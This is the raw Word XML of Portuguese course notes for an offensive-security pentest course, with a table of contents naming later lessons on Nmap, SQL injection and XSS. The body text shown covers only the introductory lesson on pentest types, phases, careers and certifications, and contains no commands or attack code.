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verta" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Averta" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:id w:val="-12305714"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="0D554929" w14:textId="2C865580" w:rsidR="00502C3F" w:rsidRPr="00711C8C" w:rsidRDefault="00502C3F">
          <w:pPr>
            <w:pStyle w:val="CabealhodoSumrio"/>
            <w:rPr>
              <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00711C8C">
            <w:rPr>
              <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
            </w:rPr>
            <w:t>Sumário</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1C7237D9" w14:textId="31FA8F7F" w:rsidR="003016FF" w:rsidRDefault="00502C3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711C8C">
            <w:rPr>
              <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="00711C8C">
            <w:rPr>
              <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="00711C8C">
            <w:rPr>
              <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc156597576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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Solyd Offensive Security – Hacking e Pentest 2.0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_Toc156597576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2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64D54ECE" w14:textId="6779A400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77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Aula 1 – Como ser um Hacker, O que é um pentest?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_Toc156597577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2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663D1FE8" w14:textId="28E378DC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78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Tipos de Pentest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_Toc156597578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2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51FDF6C6" w14:textId="230A68CA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79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As fases do Pentest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_Toc156597579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2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16F0EE90" w14:textId="455E1EA0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0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Mercado de Trabalho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_Toc156597580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2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33FCBB9E" w14:textId="088A6AD7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1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  <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Certificações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_Toc156597581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3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01B663CF" w14:textId="0B9FC2F8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2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Qualidades e Habilidades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_Toc156597582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3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4D1FB3A5" w14:textId="3FC56301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3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Aula 2 – Instalando o sistema dos hackers – Kali Linux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_Toc156597583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3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543BAAAB" w14:textId="685A2826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4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Aula 3 – Introdução ao Kali Linux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_Toc156597584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3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100F37EB" w14:textId="0C77DAA8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5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Aula 4 – Footprinting (Coleta de informações)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_Toc156597585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3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32E0E506" w14:textId="69FEB311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6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Web Firewalls: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_Toc156597586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3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78BEE8EC" w14:textId="0522A820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7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Subdomínios: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_Toc156597587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4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4EFAAC74" w14:textId="06D8D825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8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Directories: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_Toc156597588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4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01B6CEC3" w14:textId="32883AA4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89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Google Hacking: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_Toc156597589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4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5D26C28A" w14:textId="0E618318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0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Aula 5 – Reconhecimento com Nmap – Analisando o alvo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_Toc156597590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5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33020EB7" w14:textId="42B0591B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1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Enumeração de serviços (PORT SCANNING)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_Toc156597591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5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70FB4025" w14:textId="2C49C202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2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Ferramenta no Kali: NMAP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_Toc156597592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5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71D8B816" w14:textId="41B79111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3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Aula 6 – Criando suas próprias ferramentas hacker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_Toc156597593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6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221B0C85" w14:textId="2E45ECC1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4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Se eu tenho NMAP e outras ferramentas pra fazer Port Scanner, para que eu vou fazer minhas próprias ferramentas?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_Toc156597594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7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02BC0CC8" w14:textId="0D566929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5" w:history="1">
            <w:r w:rsidR="003016FF" w:rsidRPr="00FA45E6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Aula 7 – Reconhecimento Web – Encontrando Vulnerabilidades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_Toc156597595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7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03430C8F" w14:textId="1136F0EF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6" w:history="1">
            <w:r w:rsidR="003016FF" w:rsidRPr="00FA45E6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Headers da requisição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_Toc156597596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9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3E456A65" w14:textId="600D38A1" w:rsidR="003016FF" w:rsidRDefault="0000000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7" w:history="1">
            <w:r w:rsidR="003016FF" w:rsidRPr="00FA45E6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cada header acima, vai salvar uma informação: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_Toc156597597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10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080F881F" w14:textId="67E0636D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8" w:history="1">
            <w:r w:rsidR="003016FF" w:rsidRPr="00FA45E6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>A ferramenta DIRB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_Toc156597598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11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56E5BA84" w14:textId="42FA3784" w:rsidR="003016FF" w:rsidRDefault="0000000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599" w:history="1">
            <w:r w:rsidR="003016FF" w:rsidRPr="00FA45E6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>Banco de dados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_Toc156597599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11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46314F11" w14:textId="76E049A4" w:rsidR="003016FF" w:rsidRDefault="0000000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600" w:history="1">
            <w:r w:rsidR="003016FF" w:rsidRPr="00FA45E6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>SQL Injection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_Toc156597600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11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6CB31557" w14:textId="4D6AC8AC" w:rsidR="003016FF" w:rsidRDefault="0000000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601" w:history="1">
            <w:r w:rsidR="003016FF" w:rsidRPr="00FA45E6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Calibri"/>
                <w:b/>
                <w:noProof/>
              </w:rPr>
              <w:t>Cross-Site Scripting (XSS)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_Toc156597601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13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2D46A677" w14:textId="0A30528D" w:rsidR="003016FF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56597602" w:history="1">
            <w:r w:rsidR="003016FF" w:rsidRPr="00FA45E6">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Aula 8 – SQL Injection – Atacando o Servidor</w:t>
            </w:r>
            <w:r w:rsidR="003016FF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="003016FF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="003016FF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc156597602 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="003016FF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="003016FF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="003016FF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
            <w:r w:rsidR="003016FF">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1BE46251" w14:textId="0A6CE073" w:rsidR="00502C3F" w:rsidRPr="00711C8C" w:rsidRDefault="00502C3F">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00711C8C">
            <w:rPr>
              <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
              <w:b/>
              <w:bCs/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="3FAB9E62" w14:textId="77777777" w:rsidR="00502C3F" w:rsidRPr="00711C8C" w:rsidRDefault="00502C3F" w:rsidP="00502C3F">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="201E399A" w14:textId="77777777" w:rsidR="00502C3F" w:rsidRPr="00711C8C" w:rsidRDefault="00502C3F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4880CFB9" w14:textId="35E7FE94" w:rsidR="00EA5136" w:rsidRPr="00711C8C" w:rsidRDefault="004A375C" w:rsidP="004A375C">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc156597576"/>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Solyd Offensive Security</w:t>
      </w:r>
      <w:r w:rsidR="005A2308" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Hacking e Pentest 2.0</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="72A45468" w14:textId="2546FBB7" w:rsidR="004A375C" w:rsidRPr="00711C8C" w:rsidRDefault="004A375C" w:rsidP="004A375C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F335E8B" w14:textId="3B7B53D6" w:rsidR="004A375C" w:rsidRPr="00B007BE" w:rsidRDefault="004A375C" w:rsidP="004A375C">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc156597577"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aula 1 – Como ser um Hacker, O que é um pentest?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="054C0938" w14:textId="510A5FF7" w:rsidR="004A375C" w:rsidRPr="00711C8C" w:rsidRDefault="004A375C" w:rsidP="004A375C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DCE1405" w14:textId="2B2F8F07" w:rsidR="005A2308" w:rsidRPr="00711C8C" w:rsidRDefault="005A2308" w:rsidP="004A375C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Pentest</w:t>
      </w:r>
      <w:r w:rsidR="009350E5" w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">er </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">(Penetration Test)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Verifica se há alguma vulnerabilidade, profissional que irá testar a aplicação e fazer um relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F3EB2" w14:textId="51911573" w:rsidR="009350E5" w:rsidRPr="00711C8C" w:rsidRDefault="009350E5" w:rsidP="004A375C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White Hat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Hacker ético, possui até mais conhecimento por simular um black hat.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F0AF93" w14:textId="3D8C693A" w:rsidR="009350E5" w:rsidRPr="00711C8C" w:rsidRDefault="009350E5" w:rsidP="004A375C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EADB335" w14:textId="4102F024" w:rsidR="009350E5" w:rsidRPr="00B007BE" w:rsidRDefault="009350E5" w:rsidP="009350E5">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc156597578"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tipos de Pentest</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="28C36AF3" w14:textId="6BEAA5E5" w:rsidR="009350E5" w:rsidRPr="00711C8C" w:rsidRDefault="009350E5" w:rsidP="009350E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23EB362F" w14:textId="165688B5" w:rsidR="009350E5" w:rsidRPr="00711C8C" w:rsidRDefault="009350E5" w:rsidP="009350E5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 xml:space="preserve">Black Box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</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Nenhum conhecimento sobre o alvo. Simula um attack criminoso. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D0B455" w14:textId="2C1129FD" w:rsidR="009350E5" w:rsidRPr="00711C8C" w:rsidRDefault="009350E5" w:rsidP="009350E5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 xml:space="preserve">Gray box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</w:rPr>
        <w:t xml:space="preserve"> Algum conhecimento sobre o alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2984A468" w14:textId="3E1A7E1A" w:rsidR="009350E5" w:rsidRPr="00711C8C" w:rsidRDefault="009350E5" w:rsidP="009350E5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 xml:space="preserve">White box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</w:rPr>
        <w:t xml:space="preserve"> Conhecimento total sobre o alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19648117" w14:textId="3FB91A6F" w:rsidR="009350E5" w:rsidRPr="00711C8C" w:rsidRDefault="009350E5" w:rsidP="009350E5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B37EE50" w14:textId="36D040BD" w:rsidR="009350E5" w:rsidRPr="00B007BE" w:rsidRDefault="006A5A67" w:rsidP="006A5A67">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc156597579"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>As fases do Pentest</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="6E507317" w14:textId="1F5C30CB" w:rsidR="006A5A67" w:rsidRPr="00711C8C" w:rsidRDefault="006A5A67" w:rsidP="006A5A67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC8A3E7" w14:textId="642251E9" w:rsidR="006A5A67" w:rsidRPr="00711C8C" w:rsidRDefault="006A5A67" w:rsidP="006A5A67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1 –</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Definição do escopo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AD33E2" w14:textId="2994FE50" w:rsidR="006A5A67" w:rsidRPr="00711C8C" w:rsidRDefault="006A5A67" w:rsidP="006A5A67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 xml:space="preserve">2 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t>Coleta de informações</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153517AB" w14:textId="24AEFC4D" w:rsidR="006A5A67" w:rsidRPr="00711C8C" w:rsidRDefault="006A5A67" w:rsidP="006A5A67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3 –</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Análise de vulnerabilidades</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6811CE51" w14:textId="5FF402FC" w:rsidR="006A5A67" w:rsidRPr="00711C8C" w:rsidRDefault="006A5A67" w:rsidP="006A5A67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4 –</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exploração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078A06BE" w14:textId="1B6CE12D" w:rsidR="006A5A67" w:rsidRPr="00711C8C" w:rsidRDefault="006A5A67" w:rsidP="006A5A67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5 –</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pós exploração</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483C29D6" w14:textId="403902A4" w:rsidR="005A2308" w:rsidRPr="00711C8C" w:rsidRDefault="006A5A67" w:rsidP="004A375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6 –</w:t>
      </w:r>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Relatório</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABB8FEF" w14:textId="7D74E52E" w:rsidR="006A5A67" w:rsidRPr="00711C8C" w:rsidRDefault="006A5A67" w:rsidP="004A375C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08890834" w14:textId="68186348" w:rsidR="00787E64" w:rsidRPr="00B007BE" w:rsidRDefault="00787E64" w:rsidP="00787E64">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc156597580"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mercado de Trabalho</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0AA5B4C6" w14:textId="77777777" w:rsidR="00787E64" w:rsidRPr="00711C8C" w:rsidRDefault="00787E64" w:rsidP="00787E64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A63C2E" w14:textId="1214CDD3" w:rsidR="006A5A67" w:rsidRPr="00711C8C" w:rsidRDefault="00787E64" w:rsidP="00787E64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="183AB873" wp14:editId="55962E23">
            <wp:extent cx="6404963" cy="34111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4186" cy="34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C7A" w14:textId="0352AE6A" w:rsidR="00787E64" w:rsidRPr="00711C8C" w:rsidRDefault="00787E64" w:rsidP="00787E64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15F9BF8C" w14:textId="7F5C30AF" w:rsidR="00926A16" w:rsidRPr="00711C8C" w:rsidRDefault="00926A16" w:rsidP="00787E64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EC49939" w14:textId="4FBC6485" w:rsidR="00780E7E" w:rsidRPr="00711C8C" w:rsidRDefault="00780E7E" w:rsidP="00787E64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096930B0" w14:textId="77777777" w:rsidR="00F65F64" w:rsidRPr="00711C8C" w:rsidRDefault="00F65F64" w:rsidP="00787E64">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2265D8D1" w14:textId="51A48759" w:rsidR="00787E64" w:rsidRPr="00B007BE" w:rsidRDefault="00926A16" w:rsidP="00926A16">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc156597581"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Certificações</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="2FE93F38" w14:textId="222B11AD" w:rsidR="00926A16" w:rsidRPr="00711C8C" w:rsidRDefault="00926A16" w:rsidP="00926A16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A74061D" w14:textId="588A5F23" w:rsidR="00926A16" w:rsidRPr="00711C8C" w:rsidRDefault="00926A16" w:rsidP="00926A16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Solyd Offensive Security – SYCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AA41DC" w14:textId="7312286C" w:rsidR="00926A16" w:rsidRPr="00711C8C" w:rsidRDefault="00926A16" w:rsidP="00926A16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00711C8C">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Offensive Security – OSCP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA5B3C5" w14:textId="61EE3BD8" w:rsidR="00926A16" w:rsidRPr="00711C8C" w:rsidRDefault="00926A16" w:rsidP="00926A16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B7ABEEA" w14:textId="521E8EFD" w:rsidR="00926A16" w:rsidRPr="00711C8C" w:rsidRDefault="00926A16" w:rsidP="00926A16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São mais reconhecidas no mercado por serem certificações práticas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7960637D" w14:textId="01D59B9D" w:rsidR="00B359E1" w:rsidRPr="00711C8C" w:rsidRDefault="00B359E1" w:rsidP="00926A16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ABF8A68" w14:textId="1A77789C" w:rsidR="00B359E1" w:rsidRPr="00B007BE" w:rsidRDefault="00B359E1" w:rsidP="00B359E1">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc156597582"/>
      <w:r w:rsidRPr="00B007BE">
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Qualidades e Habilidades</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="745AA5A0" w14:textId="5490EABA" w:rsidR="00B359E1" w:rsidRPr="00711C8C" w:rsidRDefault="00B359E1" w:rsidP="00B359E1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Averta" w:hAnsi="Averta" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DFF063" w14:textId="20B9ABEB" w:rsidR="00F64E78" w:rsidRPr="00711C8C" w:rsidRDefault="00B359E1" w:rsidP="00B359E1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Ter ética e transparência, Saber inglês, Ter curiosidade, Gostar de desafios, Ser persistente, Saber resolver problemas, Ser autodidata, Ter disciplina, Gostar de estudar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62173B74" w14:textId="55002D7B" w:rsidR="00F64E78" w:rsidRPr="00B007BE" w:rsidRDefault="00DD5858" w:rsidP="00DD5858">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:rPr>
